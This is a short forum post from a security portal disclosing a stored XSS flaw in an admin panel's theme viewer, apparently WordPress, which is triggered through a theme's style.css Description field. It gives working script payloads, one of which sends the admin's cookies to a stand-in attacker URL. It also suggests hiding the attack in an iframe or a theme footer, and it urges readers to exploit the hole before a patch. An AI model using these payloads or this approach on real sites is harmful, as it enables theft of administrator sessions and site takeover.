Waraxe IT Security Portal

danbradster · Valuable expert

There is a critical XSS vulnerability within the theming section of the admin panel; they do not removing tags such as <script> thus leaving a hole where any theme developer can release a theme where when the admin views a theme in the themes section it executes javascript.

As an example, in my theme's style.css file I change Description: to -

Description: <script>alert("hi")</script>

Description: <script>alert(document.cookie)</script>

Description: <script>window.location="http://www.badsite.com/cookies.php?"+document.cookie</script>

The final example is obviously the worst. If I wanted to have the vulnerability execute while staying hidden I could create a hidden iframe and execute the redirect in the iframe.

This vulnerability is a simple one and I am quite surprised to see it. If they don't filter this input I assume you don't filter other input from themes such as the footer - if the iframe example used above is placed in the footer of a theme the situation could be even more dangerous. If a website is using the URL http://www.website.com/wordpress/ the cookies of http://www.website.com/ are also insecure.

I have contacted them about the issue so get in early before they patch it. Wink